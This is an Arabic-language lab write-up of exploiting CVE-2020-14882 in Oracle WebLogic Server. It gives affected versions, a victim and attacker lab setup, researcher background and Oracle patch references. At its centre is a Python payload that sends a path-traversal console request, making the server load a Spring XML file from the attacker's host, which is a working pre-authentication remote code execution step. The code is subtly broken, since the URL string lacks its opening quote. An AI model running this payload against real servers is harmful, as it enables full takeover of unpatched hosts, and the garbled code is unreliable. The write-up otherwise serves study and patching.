
الاستيلاء على Oracle WebLogic Server
CVE-2020-14882 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في مكوّن Console في خادم Oracle WebLogic Server. تم تصنيف هذه الثغرة التي تسبق المصادقة بتعقيد هجوم "منخفض" وأبرزتها Oracle على أنها "سهلة الاستغلال"، مما أدى إلى حصولها على درجة حرجة تبلغ 9.8 على مقياس CVSSv3. كان الاستغلال الناجح سيسمح لمهاجم غير مصادَق باختراق خادم Oracle WebLogic عبر HTTP والسيطرة الكاملة على المضيف. (المزيد - Tenable)
الإصدارات المدعومة المتأثرة هي 10.3.6.0.0 و12.1.3.0.0 و12.2.1.3.0 و12.2.1.4.0 و14.1.1.0.0.
الضحية (خادم WebLogic): 192.168.0.15 - Windows 10 PRO يقوم بتشغيل خادم WebLogic.
المهاجم (ملف XML مستضاف): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
الحمولة:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
ستستدعي هذه الحمولة مكتبة XML الخاصة بـ spring framework لإرسال طلب إلى خادم في نطاق المهاجم بحثًا عن ملف teste.xml.
في 28 أكتوبر، نشر باحث أمني يُدعى Jang تدوينة (بالفيتنامية) حول CVE-2020-14882، متضمنةً تفاصيل جزئية يمكن استخدامها في PoC. ليس Jang غريبًا عن ثغرات WebLogic، إذ يُنسب إليه اكتشاف ثغرة CVE-2020-2555 والإبلاغ عنها إلى Oracle، التي قامت بتصحيحها في تحديث CPU لشهر يناير 2020. في مارس، أكد Jang أن CVE-2020-2555 لم تُصلَح بالكامل. تم الكشف عن التجاوز الخاص بـ CVE-2020-2555 بواسطة باحث آخر، وهو Quynh Le من مركز VNPT لأمن المعلومات (ISC). يُنسب إلى كل من Le وJang الإبلاغ عن هذا التجاوز، والذي يُعرَف بأنه CVE-2020-2883. (المزيد - Tenable)
Oracle WebLogic: CVE-2020-14882 : تحديث التصحيح الحرج (Critical Patch Update) (المعرف Doc ID 2771503.1). (دعم Oracle)
نشرة Oracle الاستشارية لتحديث التصحيح الحرج - أكتوبر 2020. (دعم Oracle)
كيفية التخفيف من تأثير CVE-2020-14882 في WebLogic. (دعم Oracle)
ثغرة في منتج Oracle WebLogic Server التابع لـ Oracle Fusion Middleware. (Mitre - CVE)